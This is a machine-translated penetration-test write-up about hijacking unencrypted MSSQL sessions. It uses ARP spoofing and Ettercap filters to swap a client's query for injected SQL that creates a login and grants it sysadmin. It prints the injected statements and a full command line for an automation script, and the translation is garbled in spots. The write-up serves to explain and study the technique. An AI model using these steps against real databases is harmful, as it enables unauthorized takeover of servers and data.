Hacking MSSQL without knowing the password

Source: Internet
Author: User
Tags mssql client mssql server printable characters

Hacking MSSQL without knowing the password

Copyright owned by original author

0x01 Preface

In a recent penetration test, I accidentally noticed some unencrypted MSSQL traffic during packet capture. Because the syntax is put there, it won't be wrong. At first, I thought this was a way to capture the authentication credential. However, MSSQL encrypts the login traffic, which means I had to crack its encryption algorithm to obtain the credential. If a self-issued certificate is used during MSSQL installation, it is easy to crack.

Unfortunately, cracking MSSQL encryption is not within the scope of the agreement with this customer. So I can only put my curiosity aside and continue to complete this penetration test. However, I cannot help thinking about it. Is this a method to attack MSSQL without any creden? I decided to go to the lab to verify my hypothesis.

In the end, I only hacking a few data packets, so that I can control MSSQL without stealing any creden, and only through man-in-the-middle attacks.

0x02 man-in-the-middle

Back in the lab, I started my research. For my further research, I ran MSSQL Server 2012 Express on Windows Server 2014 R2. The client is a Windows 10 system and runs MSSQL Management Studio 2014. My attacker is a newly installed Kali 2.0. All machines are in the same subnet to simulate attacks on the Intranet. This environment is almost the same as my client environment.

This type of attack is MITM, and Anitian has done many such attacks, just as we have a lot of expertise on hacking infrastructure devices. The typical method of MITM is to execute some redirection. Like ARP cache poisoning (which can still be used in some environments), MITM forcibly redirects the traffic between two systems to the attacker's computer. This allows attackers to not only view the data of all victims, but also control the traffic.

This is what I want to do.

0x03 understand data

The first thing I need to know is MSSQL query traffic. To make this test more interesting, I used the sa account to log on to MSSQL. Sa is the system admin account of MSSQL and can do anything you want. If my experiment succeeds, I can use the sa permission to do something interesting.

After logging in, I opened Wireshark 2.0 on the MSSQL Server and started to capture packets. I used the "tds. query" filter to filter the Wireshark, so that other messy traffic can be hidden. Only the actual TDS query package is available. (By the way, I found that the "tds. query" filter is not supported in the old Wireshark version)

While capturing traffic, I switched back to the workstation and executed an MSSQL query statement on the test database I created. This database is called testdb and has only one table named Products. The Products table has two fields: ProductID and ProductName. Although there is no data in it, this test does not require data. This query statement Retrieves all data from the specified database table.

The query is successfully executed, and an empty table is returned. You can see that the field is listed in the lower right corner. Switch back to Wireshark. I stopped packet capture and read the captured data. I noticed a TDS query package, and then click this package to display all the data in it in front of me. MSSQL Server 2014 Express does not have any encryption by default. I can view its data in minutes.

You can easily identify the decoded data in the center pane. It even contains carriage return and line break. It is interesting to note that there is an empty byte (0x00) between two bytes ). The raw data in the following pane is obvious. Wireshark shows the periodic features of these bytes, but true, they are all empty bytes. This means that I cannot directly search for "select". I have to consider these NULL bytes in a later search and insert these NULL bytes in the final data I want to replace.

0x04 and Ettercap Filters♂Quick things

Now that I know the data, I try to find a way to manipulate the data. I decided to use Ettercap. Ettercap is a tool specially designed for MITM attacks. It also has a built-in function called Ettercap filters. A filter allows me to search for data packets and then manipulate the data. You can write a filter by yourself and load it into Ettercap. Ettercap will automatically replace the matching data each time it finds the matching data. Although this feature is somewhat restrictive, it is sufficient for PoC.

Filters is written in a simple scripting language. The functions I want to use are search and replace. The search function can search for the specified data in the data packet. replace will replace the data we want to replace. This is the key to this project.

Some characters cannot be printed because there are null bytes in the Data queried by TDS ). This means that I cannot simply search/replace a string. I need a way to search for non-printable characters, and I cannot enter NULL bytes on the keyboard. Fortunately, Ettercap filters supports hexadecimal. For example, when searching for "s", I can search by "\ x73". Therefore, empty bytes can also be expressed simply by "\ x00. Kali has a program called hexdump, which can convert a string to a hexadecimal value. I use it to convert "select" to a hexadecimal value.

Note by the translator: It's really cool ..

I wrote a filter to test the data we want.

The first line ensures that the filter will only work on TCP traffic of port 1433. If the conditions are met, the filter will output the debug information so that we can know that it finds MSSQL traffic. This is just to make me feel calm, because I know that this filter is available. Well, the next if statement searches for hex data. The data is translated as a "select" with NULL bytes ". If the filter locates this string, the debug information is also output.

Finally, let's witness a miracle. The replace command accurately replaces the specified string with the "ssssss" that contains NULL bytes ". This is just to test whether the script is running correctly. It is important to note that the length of the data we replace must be equal to the length of the data to be replaced, so that the TCP connection will not be broken.

Compile the filter. This is also very simple through the etterfilter command.

No error is reported. You can test the filter. I started the Ettercap graphical interface, started ARP spoofing, and attacked the MSSQL server and client workstation. I ran Wireshark to verify the traffic between two attackers. In Ettercap, I click "Filters-> Load a filter" and select my filter. The Ettercap console displays "Content filters loaded" information. Almost at the same time, I saw "SQL Traffic Discovered ". Everything is under planning.

The next step is to return to the workstation and then try to run the query statement. According to the plan, "select" will be replaced with "ssssss", disrupting this query. I ran this query, but this time I did not see an empty table as before, but reported an error.

"Incorrect syntax near 'sssssss '.". It's perfect. The filter works exactly as expected. It replaces "select" with "ssssss ". MSSQL cannot be understood, so an error is returned. This is the first step on the correct path. The next step is to replace all statements with the query statements that we attack.

0x05 create an account

I decided to add an account on the server. This is the best script for attackers, especially when the victims of the workstation log on to the sa account. To add an account, I need to submit the following query on MSSQL:

#!sqlCREATE LOGIN anitian WITH PASSWORD=’YouGotHacked1#’;

In this case, an account with the username "anitian" and password "YouGotHacked1 #" will be added to MSSQL. After converting it to hex, I modified the mssql. filter file.

This filter searches for "select ProductID, ProductName from Products where ProductID = 1;" and replaces it with "create login anitian with PASSWORD = 'yougothacked1 #'". I have said that the length of two strings must be the same, so how can I control my statements? Because my statement is shorter than the original statement, I only add a few spaces after the statement. spaces do not affect the statement execution result. I compiled the filter and loaded it into Ettercap using the previous method. Then I submit the query at the workstation.

Have you noticed that the returned content is different from the content returned before I used Ettercap? It turns out that an empty table is returned, but this time, no table is returned, but "Command (s) completed successfully." is returned .". If DBAs see this, they will ignore it as a strange error. Unfortunately, it's too late. I have already added my own users to the database. Now, the real hack is just getting started.

I log on to the Windows 10 workstation using my newly created user "anitian" from the previous Windows 10 workstation using my sa account.

Success! I successfully logged on to my account. Unfortunately, this account has low permissions, so I cannot do too much. However, this is a good solution. The next step is to use Ettercap filter to modify my permissions.

At this point, I can easily complete it. However, manual hex conversion is boring, and empty details need to be inserted. Who is willing to spend their thoughts on this? Is this a good PoC?

No! I don't want to give up easily. What's more, I can use a script to complete all the boring work!

0x06 automated attacks

The SQLinject. sh shell script can be downloaded here.


This script automatically completes all the processes, starting from converting SQL statements into hex, ARP attacks, and loading Ettercap filters. It makes the entire process very simple.

This script requires the following information:

MSSQL server IP address MSSQL client IP address new SQL statement to replace the original SQL statement

Generally, I know all the information except the SQL statement I want to inject. I know that I want to give anitian sysadmin permission. After quickly learning the MSSQL command, I wrote the following statement:

#!sqlALTER SERVER ROLE sysadmin ADD MEMBER anitian;

This statement will allow the newly added anitian user to have sysadmin permissions, so that I can do more. Now that I know all the four information, run the script:

#!bash./SQLInject.sh –o “select ProductID, ProductName from Products where ProductID=1;” –i “ALTER SERVER ROLE sysadmin ADD MEMBER anitian;” –s –c –f mssql.filter

With this script, I don't have to worry about the annoying hex format and empty characters. This script does everything. It converts the string to hex format, and then Outputs An Ettercap filter to mssql. filter (the file name is based on the-f parameter ). Then, the script runs etterfilter and compiles the filter. Finally, the script even runs the Ettercap on the command line interface, loads the filter, and performs ARP spoofing attacks on the MSSQL server and client workstation. It even compares the length of two strings to automatically add spaces so that the length of the two strings is equal. You only need one command to complete everything.

I ran the script and switched to the workstation. When I run the same select query, I noticed that I got the "Command (s) completed successfully" information again. This is a good symbol. Log out of the sa account and log in through anitian.

233333333! You can see that anitian has the sysadmin permission. I can use this permission to access the entire system. It gave me a very hungry central point to attack other systems on the network. Of course, assume that this database does not contain the payment card number or personal identity information I want.

However, the biggest failure of this script is that you need to know the original statement to be replaced. Fortunately, MSSQL often runs batch processing jobs or queries at specified times. Staring at Wireshark for a while, we will catch at least one query. Of course, I can also turn it into a more mature solution: conduct MITM attacks so that I can proxy all the traffic, then search for the TDS data packet in it, and then automatically replace the data, no need to know any original statement... this project will be available later...

0x07 defend against SQL MITM attacks

I don't want to translate it. You can read the original article: D.


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.